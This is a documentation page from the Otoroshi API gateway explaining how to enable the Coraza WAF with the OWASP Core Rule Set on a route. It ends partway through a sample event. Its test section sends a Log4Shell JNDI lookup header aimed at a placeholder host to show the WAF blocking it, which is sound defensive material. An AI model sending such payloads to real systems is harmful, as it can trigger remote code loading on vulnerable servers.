<!DOCTYPE html>
<html class="no-js" lang="en">

<head>
<title>Instantiate a WAF with Coraza · Otoroshi</title>
<meta charset="utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="description" content='otoroshi-manual'/>
<link href="https://fonts.googleapis.com/css?family=Roboto:100normal,100italic,300normal,300italic,400normal,400italic,500normal,500italic,700normal,700italic,900normal,900italicc" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="../lib/jquery/jquery.min.js"></script>
<script type="text/javascript" src="../js/page.js"></script>
<script type="text/javascript" src="../js/cc.js"></script>
<script type="text/javascript" src="../js/groups.js"></script>
<script type="text/javascript" src="../js/plugins.js"></script>
<script type="text/javascript" src="../js/ngplugins.js"></script>
<script type="text/javascript" src="../js/expression-language.js"></script>
<script type="text/javascript" src="../search/pagefind-ui.js"></script>
<link rel="stylesheet" type="text/css" href="../lib/normalize.css/normalize.css"/>
<link rel="stylesheet" type="text/css" href="../lib/foundation/dist/foundation.min.css"/>
<link rel="stylesheet" type="text/css" href="../css/page.css"/>
<link rel="stylesheet" type="text/css" href="../css/plugins.css"/>
<link rel="stylesheet" type="text/css" href="../search/pagefind-ui.css"/>

<!--
<link rel="shortcut icon" href="../images/favicon.ico" />
-->
</head>

<body>
<div class="off-canvas-wrapper">
<div class="off-canvas-wrapper-inner" data-off-canvas-wrapper>

<div class="off-canvas position-left" id="off-canvas-menu" data-off-canvas>
<nav class="off-canvas-nav">
<div class="nav-home">
<a href="../index.html" >
<span class="home-icon">⌂</span>Otoroshi
</a>
<div class="version-number">
16.11.2
</div>
</div>
<div class="nav-toc">
<ul>
  <li><a href="../about.html" class="page">About Otoroshi</a></li>
  <li><a href="../architecture.html" class="page">Architecture</a></li>
  <li><a href="../features.html" class="page">Features</a></li>
  <li><a href="../getting-started.html" class="page">Getting Started</a></li>
  <li><a href="../install/index.html" class="page">Install</a>
  <ul>
    <li><a href="../install/get-otoroshi.html" class="page">Get Otoroshi</a></li>
    <li><a href="../install/setup-otoroshi.html" class="page">Setup Otoroshi</a></li>
    <li><a href="../install/run-otoroshi.html" class="page">Run Otoroshi</a></li>
  </ul></li>
  <li><a href="../entities/index.html" class="page">Main entities</a>
  <ul>
    <li><a href="../entities/routes.html" class="page">Routes</a></li>
    <li><a href="../entities/backends.html" class="page">Backends</a></li>
    <li><a href="../entities/organizations.html" class="page">Organizations</a></li>
    <li><a href="../entities/teams.html" class="page">Teams</a></li>
    <li><a href="../entities/global-config.html" class="page">Global config</a></li>
    <li><a href="../entities/apikeys.html" class="page">Apikeys</a></li>
    <li><a href="../entities/service-groups.html" class="page">Service groups</a></li>
    <li><a href="../entities/auth-modules.html" class="page">Authentication modules</a></li>
    <li><a href="../entities/certificates.html" class="page">Certificates</a></li>
    <li><a href="../entities/jwt-verifiers.html" class="page">JWT verifiers</a></li>
    <li><a href="../entities/data-exporters.html" class="page">Data exporters</a></li>
    <li><a href="../entities/scripts.html" class="page">Scripts</a></li>
    <li><a href="../entities/tcp-services.html" class="page">TCP services</a></li>
    <li><a href="../entities/service-descriptors.html" class="page">Service descriptors</a></li>
  </ul></li>
  <li><a href="../topics/index.html" class="page">Detailed topics</a>
  <ul>
    <li><a href="../topics/engine.html" class="page">Proxy engine</a></li>
    <li><a href="../topics/wasm-usage.html" class="page">Otoroshi and WASM</a></li>
    <li><a href="../topics/chaos-engineering.html" class="page">Chaos engineering with the Snow Monkey</a></li>
    <li><a href="../topics/tls.html" class="page">TLS</a></li>
    <li><a href="../topics/pki.html" class="page">Otoroshi&rsquo;s PKI</a></li>
    <li><a href="../topics/monitoring.html" class="page">Monitoring</a></li>
    <li><a href="../topics/events-and-analytics.html" class="page">Events and analytics</a></li>
    <li><a href="../topics/dev-portal.html" class="page">Developer portal with Daikoku</a></li>
    <li><a href="../topics/sessions-mgmt.html" class="page">Sessions management</a></li>
    <li><a href="../topics/otoroshi-protocol.html" class="page">The Otoroshi communication protocol</a></li>
    <li><a href="../topics/expression-language.html" class="page">Expression language</a></li>
    <li><a href="../topics/user-rights.html" class="page">Otoroshi user rights</a></li>
    <li><a href="../topics/graphql-composer.html" class="page">GraphQL Composer Plugin</a></li>
    <li><a href="../topics/secrets.html" class="page">Secrets management</a></li>
    <li><a href="../topics/tunnels.html" class="page">Otoroshi tunnels</a></li>
    <li><a href="../topics/relay-routing.html" class="page">Relay Routing</a></li>
    <li><a href="../topics/netty-server.html" class="page">Alternative HTTP server</a></li>
    <li><a href="../topics/http3.html" class="page">HTTP3 support</a></li>
    <li><a href="../topics/anonymous-reporting.html" class="page">Anonymous reporting</a></li>
    <li><a href="../topics/opentelemetry.html" class="page">OpenTelemetry support</a></li>
    <li><a href="../topics/green-score.html" class="page">Green Score</a></li>
  </ul></li>
  <li><a href="../how-to-s/index.html" class="page">How to&rsquo;s</a>
  <ul>
    <li><a href="../how-to-s/wasm-usage.html" class="page">Using wasm plugins</a></li>
    <li><a href="../how-to-s/wasmo-installation.html" class="page">Deploy your own Wasmo</a></li>
    <li><a href="../how-to-s/tailscale-integration.html" class="page">Tailscale integration</a></li>
    <li><a href="../how-to-s/end-to-end-mtls.html" class="page">End-to-end mTLS</a></li>
    <li><a href="../how-to-s/export-alerts-using-mailgun.html" class="page">Send alerts using mailgun</a></li>
    <li><a href="../how-to-s/export-events-to-elastic.html" class="page">Export events to Elasticsearch</a></li>
    <li><a href="../how-to-s/import-export-otoroshi-datastore.html" class="page">Import and export Otoroshi datastore</a></li>
    <li><a href="../how-to-s/secure-app-with-auth0.html" class="page">Secure an app with Auth0</a></li>
    <li><a href="../how-to-s/secure-app-with-keycloak.html" class="page">Secure an app with Keycloak</a></li>
    <li><a href="../how-to-s/secure-app-with-ldap.html" class="page">Secure an app and/or your Otoroshi UI with LDAP</a></li>
    <li><a href="../how-to-s/secure-with-apikey.html" class="page">Secure an api with api keys</a></li>
    <li><a href="../how-to-s/secure-with-oauth1-client.html" class="page">Secure an app with OAuth1 client flow</a></li>
    <li><a href="../how-to-s/secure-with-oauth2-client-credentials.html" class="page">Secure an app with OAuth2 client_credential flow</a></li>
    <li><a href="../how-to-s/setup-otoroshi-cluster.html" class="page">Setup an Otoroshi cluster</a></li>
    <li><a href="../how-to-s/tls-using-lets-encrypt.html" class="page">TLS termination using Let&rsquo;s Encrypt</a></li>
    <li><a href="../how-to-s/secure-an-app-with-jwt-verifiers.html" class="page">Secure an api with jwt verifiers</a></li>
    <li><a href="../how-to-s/secure-the-communication-between-a-backend-app-and-otoroshi.html" class="page">Secure the communication between a backend app and Otoroshi</a></li>
    <li><a href="../how-to-s/tls-termination-using-own-certificates.html" class="page">TLS termination using your own certificates</a></li>
    <li><a href="../how-to-s/resources-loader.html" class="page">The resources loader</a></li>
    <li><a href="../how-to-s/custom-log-levels.html" class="page">Log levels customization</a></li>
    <li><a href="../how-to-s/custom-initial-state.html" class="page">Initial state customization</a></li>
    <li><a href="../how-to-s/communicate-with-kafka.html" class="page">Communicate with Kafka</a></li>
    <li><a href="../how-to-s/create-custom-auth-module.html" class="page">Create your Authentication module</a></li>
    <li><a href="../how-to-s/working-with-eureka.html" class="page">Working with Eureka</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html" class="active page">Instantiate a WAF with Coraza</a></li>
  </ul></li>
  <li><a href="../plugins/index.html" class="page">Otoroshi plugins</a>
  <ul>
    <li><a href="../plugins/plugins.html" class="page">Otoroshi plugins system</a></li>
    <li><a href="../plugins/create-plugins.html" class="page">Create plugins</a></li>
    <li><a href="../plugins/built-in-plugins.html" class="page">Built-in plugins</a></li>
    <li><a href="../plugins/built-in-legacy-plugins.html" class="page">Built-in legacy plugins</a></li>
  </ul></li>
  <li><a href="../api.html" class="page">Admin REST API</a></li>
  <li><a href="../deploy/index.html" class="page">Deploy to production</a>
  <ul>
    <li><a href="../deploy/clustering.html" class="page">Otoroshi clustering</a></li>
    <li><a href="../deploy/kubernetes.html" class="page">Kubernetes</a></li>
    <li><a href="../deploy/clever-cloud.html" class="page">Clever-Cloud</a></li>
    <li><a href="../deploy/aws.html" class="page">AWS - Elastic Beanstalk</a></li>
    <li><a href="../deploy/scaling.html" class="page">Scaling Otoroshi</a></li>
  </ul></li>
  <li><a href="../dev.html" class="page">Developing Otoroshi</a></li>
  <li><a href="../search.html" class="page">Search otoroshi documentation</a></li>
</ul>
</div>

</nav>
</div>

<div class="off-canvas-content" data-off-canvas-content>

<header class="site-header expanded row">
<div class="small-12 column">
<a href="#" class="off-canvas-toggle hide-for-medium" data-toggle="off-canvas-menu"><svg class="svg-icon svg-icon-menu" version="1.1" id="Menu" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 20 20" enable-background="new 0 0 20 20" xml:space="preserve"> <path class="svg-icon-menu-path" fill="#53CDEC" d="M16.4,9H3.6C3.048,9,3,9.447,3,10c0,0.553,0.048,1,0.6,1H16.4c0.552,0,0.6-0.447,0.6-1C17,9.447,16.952,9,16.4,9z M16.4,13
H3.6C3.048,13,3,13.447,3,14c0,0.553,0.048,1,0.6,1H16.4c0.552,0,0.6-0.447,0.6-1C17,13.447,16.952,13,16.4,13z M3.6,7H16.4
C16.952,7,17,6.553,17,6c0-0.553-0.048-1-0.6-1H3.6C3.048,5,3,5.447,3,6C3,6.553,3.048,7,3.6,7z"/></svg>
</a>
<div class="title-wrapper">
<div class="title-logo"></div>
<div class="title"><a href="../index.html">Otoroshi</a></div>
</div>
<!--
<a href="https://www.example.com" class="logo show-for-medium">logo</a>
-->
</div>
</header>

<div class="expanded row">

<div class="medium-3 large-2 show-for-medium column">
<nav class="site-nav">
<div class="nav-home">
<a href="../index.html" >
<span class="home-icon">⌂</span>Otoroshi
</a>
<div class="version-number">
16.11.2
</div>
</div>
<div class="nav-toc">
<ul>
  <li><a href="../about.html" class="page">About Otoroshi</a></li>
  <li><a href="../architecture.html" class="page">Architecture</a></li>
  <li><a href="../features.html" class="page">Features</a></li>
  <li><a href="../getting-started.html" class="page">Getting Started</a></li>
  <li><a href="../install/index.html" class="page">Install</a>
  <ul>
    <li><a href="../install/get-otoroshi.html" class="page">Get Otoroshi</a></li>
    <li><a href="../install/setup-otoroshi.html" class="page">Setup Otoroshi</a></li>
    <li><a href="../install/run-otoroshi.html" class="page">Run Otoroshi</a></li>
  </ul></li>
  <li><a href="../entities/index.html" class="page">Main entities</a>
  <ul>
    <li><a href="../entities/routes.html" class="page">Routes</a></li>
    <li><a href="../entities/backends.html" class="page">Backends</a></li>
    <li><a href="../entities/organizations.html" class="page">Organizations</a></li>
    <li><a href="../entities/teams.html" class="page">Teams</a></li>
    <li><a href="../entities/global-config.html" class="page">Global config</a></li>
    <li><a href="../entities/apikeys.html" class="page">Apikeys</a></li>
    <li><a href="../entities/service-groups.html" class="page">Service groups</a></li>
    <li><a href="../entities/auth-modules.html" class="page">Authentication modules</a></li>
    <li><a href="../entities/certificates.html" class="page">Certificates</a></li>
    <li><a href="../entities/jwt-verifiers.html" class="page">JWT verifiers</a></li>
    <li><a href="../entities/data-exporters.html" class="page">Data exporters</a></li>
    <li><a href="../entities/scripts.html" class="page">Scripts</a></li>
    <li><a href="../entities/tcp-services.html" class="page">TCP services</a></li>
    <li><a href="../entities/service-descriptors.html" class="page">Service descriptors</a></li>
  </ul></li>
  <li><a href="../topics/index.html" class="page">Detailed topics</a>
  <ul>
    <li><a href="../topics/engine.html" class="page">Proxy engine</a></li>
    <li><a href="../topics/wasm-usage.html" class="page">Otoroshi and WASM</a></li>
    <li><a href="../topics/chaos-engineering.html" class="page">Chaos engineering with the Snow Monkey</a></li>
    <li><a href="../topics/tls.html" class="page">TLS</a></li>
    <li><a href="../topics/pki.html" class="page">Otoroshi&rsquo;s PKI</a></li>
    <li><a href="../topics/monitoring.html" class="page">Monitoring</a></li>
    <li><a href="../topics/events-and-analytics.html" class="page">Events and analytics</a></li>
    <li><a href="../topics/dev-portal.html" class="page">Developer portal with Daikoku</a></li>
    <li><a href="../topics/sessions-mgmt.html" class="page">Sessions management</a></li>
    <li><a href="../topics/otoroshi-protocol.html" class="page">The Otoroshi communication protocol</a></li>
    <li><a href="../topics/expression-language.html" class="page">Expression language</a></li>
    <li><a href="../topics/user-rights.html" class="page">Otoroshi user rights</a></li>
    <li><a href="../topics/graphql-composer.html" class="page">GraphQL Composer Plugin</a></li>
    <li><a href="../topics/secrets.html" class="page">Secrets management</a></li>
    <li><a href="../topics/tunnels.html" class="page">Otoroshi tunnels</a></li>
    <li><a href="../topics/relay-routing.html" class="page">Relay Routing</a></li>
    <li><a href="../topics/netty-server.html" class="page">Alternative HTTP server</a></li>
    <li><a href="../topics/http3.html" class="page">HTTP3 support</a></li>
    <li><a href="../topics/anonymous-reporting.html" class="page">Anonymous reporting</a></li>
    <li><a href="../topics/opentelemetry.html" class="page">OpenTelemetry support</a></li>
    <li><a href="../topics/green-score.html" class="page">Green Score</a></li>
  </ul></li>
  <li><a href="../how-to-s/index.html" class="page">How to&rsquo;s</a>
  <ul>
    <li><a href="../how-to-s/wasm-usage.html" class="page">Using wasm plugins</a></li>
    <li><a href="../how-to-s/wasmo-installation.html" class="page">Deploy your own Wasmo</a></li>
    <li><a href="../how-to-s/tailscale-integration.html" class="page">Tailscale integration</a></li>
    <li><a href="../how-to-s/end-to-end-mtls.html" class="page">End-to-end mTLS</a></li>
    <li><a href="../how-to-s/export-alerts-using-mailgun.html" class="page">Send alerts using mailgun</a></li>
    <li><a href="../how-to-s/export-events-to-elastic.html" class="page">Export events to Elasticsearch</a></li>
    <li><a href="../how-to-s/import-export-otoroshi-datastore.html" class="page">Import and export Otoroshi datastore</a></li>
    <li><a href="../how-to-s/secure-app-with-auth0.html" class="page">Secure an app with Auth0</a></li>
    <li><a href="../how-to-s/secure-app-with-keycloak.html" class="page">Secure an app with Keycloak</a></li>
    <li><a href="../how-to-s/secure-app-with-ldap.html" class="page">Secure an app and/or your Otoroshi UI with LDAP</a></li>
    <li><a href="../how-to-s/secure-with-apikey.html" class="page">Secure an api with api keys</a></li>
    <li><a href="../how-to-s/secure-with-oauth1-client.html" class="page">Secure an app with OAuth1 client flow</a></li>
    <li><a href="../how-to-s/secure-with-oauth2-client-credentials.html" class="page">Secure an app with OAuth2 client_credential flow</a></li>
    <li><a href="../how-to-s/setup-otoroshi-cluster.html" class="page">Setup an Otoroshi cluster</a></li>
    <li><a href="../how-to-s/tls-using-lets-encrypt.html" class="page">TLS termination using Let&rsquo;s Encrypt</a></li>
    <li><a href="../how-to-s/secure-an-app-with-jwt-verifiers.html" class="page">Secure an api with jwt verifiers</a></li>
    <li><a href="../how-to-s/secure-the-communication-between-a-backend-app-and-otoroshi.html" class="page">Secure the communication between a backend app and Otoroshi</a></li>
    <li><a href="../how-to-s/tls-termination-using-own-certificates.html" class="page">TLS termination using your own certificates</a></li>
    <li><a href="../how-to-s/resources-loader.html" class="page">The resources loader</a></li>
    <li><a href="../how-to-s/custom-log-levels.html" class="page">Log levels customization</a></li>
    <li><a href="../how-to-s/custom-initial-state.html" class="page">Initial state customization</a></li>
    <li><a href="../how-to-s/communicate-with-kafka.html" class="page">Communicate with Kafka</a></li>
    <li><a href="../how-to-s/create-custom-auth-module.html" class="page">Create your Authentication module</a></li>
    <li><a href="../how-to-s/working-with-eureka.html" class="page">Working with Eureka</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html" class="active page">Instantiate a WAF with Coraza</a></li>
  </ul></li>
  <li><a href="../plugins/index.html" class="page">Otoroshi plugins</a>
  <ul>
    <li><a href="../plugins/plugins.html" class="page">Otoroshi plugins system</a></li>
    <li><a href="../plugins/create-plugins.html" class="page">Create plugins</a></li>
    <li><a href="../plugins/built-in-plugins.html" class="page">Built-in plugins</a></li>
    <li><a href="../plugins/built-in-legacy-plugins.html" class="page">Built-in legacy plugins</a></li>
  </ul></li>
  <li><a href="../api.html" class="page">Admin REST API</a></li>
  <li><a href="../deploy/index.html" class="page">Deploy to production</a>
  <ul>
    <li><a href="../deploy/clustering.html" class="page">Otoroshi clustering</a></li>
    <li><a href="../deploy/kubernetes.html" class="page">Kubernetes</a></li>
    <li><a href="../deploy/clever-cloud.html" class="page">Clever-Cloud</a></li>
    <li><a href="../deploy/aws.html" class="page">AWS - Elastic Beanstalk</a></li>
    <li><a href="../deploy/scaling.html" class="page">Scaling Otoroshi</a></li>
  </ul></li>
  <li><a href="../dev.html" class="page">Developing Otoroshi</a></li>
  <li><a href="../search.html" class="page">Search otoroshi documentation</a></li>
</ul>
</div>

</nav>
</div>

<div class="small-12 medium-9 large-10 column">
<section class="site-content">

<div class="page-header row">
<div class="medium-12 show-for-medium column">
<div class="nav-breadcrumbs">
<ul>
  <li><a href="../index.html">Otoroshi</a></li>
  <li><a href="../how-to-s/index.html">How to&rsquo;s</a></li>
  <li>Instantiate a WAF with Coraza</li>
</ul>
</div>
</div>
</div>

<div class="page-content row">
<div class="small-12 large-9 column" id="docs">
<h1><a href="#instantiate-a-waf-with-coraza" name="instantiate-a-waf-with-coraza" class="anchor"><span class="anchor-link"></span></a>Instantiate a WAF with Coraza</h1>
<p>Sometimes you may want to secure an app with a <a href="https://en.wikipedia.org/wiki/Web_application_firewall">Web Appplication Firewall (WAF)</a> and apply the security rules from the <a href="https://owasp.org/www-project-modsecurity-core-rule-set/">OWASP Core Rule Set</a>. To allow that, we integrated <a href="https://coraza.io/">the Coraza WAF</a> in Otoroshi through a plugin that uses the WASM version of Coraza.</p>
<h3><a href="#before-you-start" name="before-you-start" class="anchor"><span class="anchor-link"></span></a>Before you start</h3><p>If you already have an up and running otoroshi instance, you can skip the following instructions</p><div class="instructions">
<div id="instructions-toggle">
<span class="instructions-title">Set up an Otoroshi</span>
<button id="instructions-toggle-button">close</button>
</div>
<p>Let&rsquo;s start by downloading the latest Otoroshi.</p>
<pre class="prettyprint"><code class="language-sh">curl -L -o otoroshi.jar &#39;https://github.com/MAIF/otoroshi/releases/download/v16.11.2/otoroshi.jar&#39;
</code></pre>
<p>then you can run start Otoroshi :</p>
<pre class="prettyprint"><code class="language-sh">java -Dotoroshi.adminPassword=password -jar otoroshi.jar 
</code></pre>
<p>Now you can log into Otoroshi at <a href="http://otoroshi.oto.tools:8080">http://otoroshi.oto.tools:8080</a> with <code>admin@otoroshi.io/password</code></p>
<p>Create a new route, exposed on <code>http://myservice.oto.tools:8080</code>, which will forward all requests to the mirror <code>https://mirror.otoroshi.io</code>. Each call to this service will returned the body and the headers received by the mirror.</p>
<pre class="prettyprint"><code class="language-sh">curl -X POST &#39;http://otoroshi-api.oto.tools:8080/api/routes&#39; \
-H &quot;Content-type: application/json&quot; \
-u admin-api-apikey-id:admin-api-apikey-secret \
-d @- &lt;&lt;&#39;EOF&#39;
{
  &quot;name&quot;: &quot;my-service&quot;,
  &quot;frontend&quot;: {
    &quot;domains&quot;: [&quot;myservice.oto.tools&quot;]
  },
  &quot;backend&quot;: {
    &quot;targets&quot;: [
      {
        &quot;hostname&quot;: &quot;mirror.otoroshi.io&quot;,
        &quot;port&quot;: 443,
        &quot;tls&quot;: true
      }
    ]
  }
}
EOF
</code></pre>
<button id="instructions-toggle-confirm">Confirm the installation</button></div>
<h3><a href="#create-a-waf-configuration" name="create-a-waf-configuration" class="anchor"><span class="anchor-link"></span></a>Create a WAF configuration</h3>
<p>first, go on <a href="http://otoroshi.oto.tools:8080/bo/dashboard/features">the features page of otoroshi</a> and then click on the <a href="http://otoroshi.oto.tools:8080/bo/dashboard/extensions/coraza-waf/coraza-configs">Coraza WAF configs. item</a>. </p>
<p>Now create a new configuration, give it a name and a description, ensure that you enabled the <code>Inspect req/res body</code> flag and save your configuration.</p>
<p>The corresponding admin api call is the following :</p>
<pre class="prettyprint"><code class="language-sh">curl -X POST &#39;http://otoroshi-api.oto.tools:8080/apis/coraza-waf.extensions.otoroshi.io/v1/coraza-configs&#39; \
  -u admin-api-apikey-id:admin-api-apikey-secret -H &#39;Content-Type: application/json&#39; -d &#39;
{
  &quot;id&quot;: &quot;coraza-waf-demo&quot;,
  &quot;name&quot;: &quot;My blocking WAF&quot;,
  &quot;description&quot;: &quot;An awesome WAF&quot;,
  &quot;inspect_body&quot;: true,
  &quot;config&quot;: {
    &quot;directives_map&quot;: {
      &quot;default&quot;: [
        &quot;Include @recommended-conf&quot;,
        &quot;Include @crs-setup-conf&quot;,
        &quot;Include @owasp_crs/*.conf&quot;,
        &quot;SecRuleEngine DetectionOnly&quot;
      ]
    },
    &quot;default_directives&quot;: &quot;default&quot;,
    &quot;per_authority_directives&quot;: {}
  }
}&#39;
</code></pre>
<h3><a href="#configure-coraza-and-the-owasp-core-rule-set" name="configure-coraza-and-the-owasp-core-rule-set" class="anchor"><span class="anchor-link"></span></a>Configure Coraza and the OWASP Core Rule Set</h3>
<p>Now you can easily configure the coraza WAF in the <code>json</code> config. section. By default it should look something like :</p>
<pre class="prettyprint"><code class="language-json">{
  &quot;directives_map&quot;: {
    &quot;default&quot;: [
      &quot;Include @recommended-conf&quot;,
      &quot;Include @crs-setup-conf&quot;,
      &quot;Include @owasp_crs/*.conf&quot;,
      &quot;SecRuleEngine DetectionOnly&quot;
    ]
  },
  &quot;default_directives&quot;: &quot;default&quot;,
  &quot;per_authority_directives&quot;: {}
}
</code></pre>
<p>You can find anything about it in <a href="https://coraza.io/docs/tutorials/introduction/">the documentation of Coraza</a>.</p>
<p>here we have the basic setup to apply the OWASP core rule set in detection mode only. So each time Coraza will find something weird in a request, it will only log it but let the request pass.  We can enable blocking by setting <code>&quot;SecRuleEngine On&quot;</code></p>
<p>we can also deny access to the <code>/admin</code> uri by adding the following directive</p>
<pre class="prettyprint"><code class="language-json">&quot;SecRule REQUEST_URI \&quot;@streq /admin\&quot; \&quot;id:101,phase:1,t:lowercase,deny\&quot;&quot;
</code></pre>
<p>You can also provide multiple profile of rules in the <code>directives_map</code> with different names and use the <code>per_authority_directives</code> object to map hostnames to a specific profile.</p>
<p>the corresponding admin api call is the following :</p>
<pre class="prettyprint"><code class="language-sh">curl -X PUT &#39;http://otoroshi-api.oto.tools:8080/apis/coraza-waf.extensions.otoroshi.io/v1/coraza-configs/coraza-waf-demo&#39; \
  -u admin-api-apikey-id:admin-api-apikey-secret -H &#39;Content-Type: application/json&#39; -d &#39;
{
  &quot;id&quot;: &quot;coraza-waf-demo&quot;,
  &quot;name&quot;: &quot;My blocking WAF&quot;,
  &quot;description&quot;: &quot;An awesome WAF&quot;,
  &quot;inspect_body&quot;: true,
  &quot;config&quot;: {
    &quot;directives_map&quot;: {
      &quot;default&quot;: [
        &quot;Include @recommended-conf&quot;,
        &quot;Include @crs-setup-conf&quot;,
        &quot;Include @owasp_crs/*.conf&quot;,
        &quot;SecRule REQUEST_URI \&quot;@streq /admin\&quot; \&quot;id:101,phase:1,t:lowercase,deny\&quot;&quot;,
        &quot;SecRuleEngine On&quot;
      ]
    },
    &quot;default_directives&quot;: &quot;default&quot;,
    &quot;per_authority_directives&quot;: {}
  }
}&#39;
</code></pre>
<h3><a href="#add-the-waf-plugin-on-your-route" name="add-the-waf-plugin-on-your-route" class="anchor"><span class="anchor-link"></span></a>Add the WAF plugin on your route</h3>
<p>Now you can create a new route that will use your WAF configuration. Let say we want a route on <code>http://wouf.oto.tools:8080</code> to goes to <code>https://www.otoroshi.io</code>. Now add the <code>Coraza WAF</code> plugin to your route and in the configuration select the configuration you created previously.</p>
<p>the corresponding admin api call is the following :</p>
<pre class="prettyprint"><code class="language-sh">curl -X POST &#39;http://otoroshi-api.oto.tools:8080/api/routes&#39; \
  -u admin-api-apikey-id:admin-api-apikey-secret \
  -H &#39;Content-Type: application/json&#39; -d &#39;
{
  &quot;id&quot;: &quot;route_demo&quot;,
  &quot;name&quot;: &quot;WAF route&quot;,
  &quot;description&quot;: &quot;A new route with a WAF enabled&quot;,
  &quot;frontend&quot;: {
    &quot;domains&quot;: [
      &quot;wouf.oto.tools&quot;
    ]
  },
  &quot;backend&quot;: {
    &quot;targets&quot;: [
      {
        &quot;hostname&quot;: &quot;www.otoroshi.io&quot;,
        &quot;port&quot;: 443,
        &quot;tls&quot;: true
      }
    ]
  },
  &quot;plugins&quot;: [
    {
      &quot;plugin&quot;: &quot;cp:otoroshi.wasm.proxywasm.NgCorazaWAF&quot;,
      &quot;config&quot;: {
        &quot;ref&quot;: &quot;coraza-waf-demo&quot;
      },
      &quot;plugin_index&quot;: {
        &quot;validate_access&quot;: 0,
        &quot;transform_request&quot;: 0,
        &quot;transform_response&quot;: 0
      }
    },
    {
      &quot;plugin&quot;: &quot;cp:otoroshi.next.plugins.OverrideHost&quot;,
      &quot;plugin_index&quot;: {
        &quot;transform_request&quot;: 1
      }
    }
  ]
}&#39;
</code></pre>
<h3><a href="#try-to-use-an-exploit-" name="try-to-use-an-exploit-" class="anchor"><span class="anchor-link"></span></a>Try to use an exploit ;)</h3>
<p>let try to trigger Coraza with a Log4Shell crafted request:</p>
<pre class="prettyprint"><code class="language-sh">curl &#39;http://wouf.oto.tools:9999&#39; -H &#39;foo: ${jndi:rmi://foo/bar}&#39; --include

HTTP/1.1 403 Forbidden
Date: Thu, 25 May 2023 09:47:04 GMT
Content-Type: text/plain
Content-Length: 0

</code></pre>
<p>or access to <code>/admin</code></p>
<pre class="prettyprint"><code class="language-sh">curl &#39;http://wouf.oto.tools:9999/admin&#39; --include

HTTP/1.1 403 Forbidden
Date: Thu, 25 May 2023 09:47:04 GMT
Content-Type: text/plain
Content-Length: 0

</code></pre>
<p>if you look at otoroshi logs you will find something like :</p>
<pre class="prettyprint"><code class="language-log">[error] otoroshi-proxy-wasm - [client &quot;127.0.0.1&quot;] Coraza: Warning. Potential Remote Command Execution: Log4j / Log4shell 
  [file &quot;@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf&quot;] [line &quot;10608&quot;] [id &quot;944150&quot;] [rev &quot;&quot;] 
  [msg &quot;Potential Remote Command Execution: Log4j / Log4shell&quot;] [data &quot;&quot;] [severity &quot;critical&quot;] 
  [ver &quot;OWASP_CRS/4.0.0-rc1&quot;] [maturity &quot;0&quot;] [accuracy &quot;0&quot;] [tag &quot;application-multi&quot;] 
  [tag &quot;language-java&quot;] [tag &quot;platform-multi&quot;] [tag &quot;attack-rce&quot;] [tag &quot;OWASP_CRS&quot;] 
  [tag &quot;capec/1000/152/137/6&quot;] [tag &quot;PCI/6.5.2&quot;] [tag &quot;paranoia-level/1&quot;] [hostname &quot;wwwwouf.oto.tools&quot;] 
  [uri &quot;/&quot;] [unique_id &quot;uTYakrlgMBydVGLodbz&quot;]
[error] otoroshi-proxy-wasm - [client &quot;127.0.0.1&quot;] Coraza: Warning. Inbound Anomaly Score Exceeded (Total Score: 5) 
  [file &quot;@owasp_crs/REQUEST-949-BLOCKING-EVALUATION.conf&quot;] [line &quot;11029&quot;] [id &quot;949110&quot;] [rev &quot;&quot;] 
  [msg &quot;Inbound Anomaly Score Exceeded (Total Score: 5)&quot;] 
  [data &quot;&quot;] [severity &quot;emergency&quot;] [ver &quot;OWASP_CRS/4.0.0-rc1&quot;] [maturity &quot;0&quot;] [accuracy &quot;0&quot;] 
  [tag &quot;anomaly-evaluation&quot;] [hostname &quot;wwwwouf.oto.tools&quot;] [uri &quot;/&quot;] [unique_id &quot;uTYakrlgMBydVGLodbz&quot;]
[info] otoroshi-proxy-wasm - Transaction interrupted tx_id=&quot;uTYakrlgMBydVGLodbz&quot; context_id=3 action=&quot;deny&quot; phase=&quot;http_response_headers&quot;
...
[error] otoroshi-proxy-wasm - [client &quot;127.0.0.1&quot;] Coraza: Warning.  [file &quot;&quot;] [line &quot;12914&quot;] 
  [id &quot;101&quot;] [rev &quot;&quot;] [msg &quot;&quot;] [data &quot;&quot;] [severity &quot;emergency&quot;] [ver &quot;&quot;] [maturity &quot;0&quot;] [accuracy &quot;0&quot;] 
  [hostname &quot;wwwwouf.oto.tools&quot;] [uri &quot;/admin&quot;] [unique_id &quot;mqXZeMdzRaVAqIiqvHf&quot;]
[info] otoroshi-proxy-wasm - Transaction interrupted tx_id=&quot;mqXZeMdzRaVAqIiqvHf&quot; context_id=2 action=&quot;deny&quot; phase=&quot;http_request_headers&quot;
</code></pre>
<h3><a href="#generated-events" name="generated-events" class="anchor"><span class="anchor-link"></span></a>Generated events</h3>
<p>each time Coraza will generate log about vunerability detection, an event will be generated in otoroshi and exporter through the usual data exporter way. The event will look like :</p>
<pre class="prettyprint"><code class="language-json">{
  &quot;@id&quot; : &quot;86b647450-3cc7-42a9-aaec-828d261a8c74&quot;,
  &quot;@timestamp&quot; : 1684938211157,
  &quot;@type&quot; : &quot;CorazaTrailEvent&quot;,
  &quot;@product&quot; : &quot;otoroshi&quot;,
  &quot;@serviceId&quot; : &quot;--&quot;,
  &quot;@service&quot; : &quot;--&quot;,
  &quot;@env&quot; : &quot;prod&quot;,
  &quot;level&quot; : &quot;ERROR&quot;,
  &quot;msg&quot; : &quot;Coraza: Warning. Potential Remote Command Execution: Log4j / Log4shell&quot;,
  &quot;fields&quot; : {
    &quot;hostname&quot; : &quot;wouf.oto.tools&quot;,
    &quot;maturity&quot; : &quot;0&quot;,
    &quot;line&quot; : &quot;10608&quot;,
    &quot;unique_id&quot; : &quot;oNbisKlXWaCdXntaUpq&quot;,
    &quot;tag&quot; : &quot;paranoia-level/1&quot;,
    &quot;data&quot; : &quot;&quot;,
    &quot;accuracy&quot; : &quot;0&quot;,
    &quot;uri&quot; : &quot;/&quot;,
    &quot;rev&quot; : &quot;&quot;,
    &quot;id&quot; : &quot;944150&quot;,
    &quot;client&quot; : &quot;127.0.0.1&quot;,
    &quot;ver&quot; : &quot;OWASP_CRS/4.0.0-rc1&quot;,
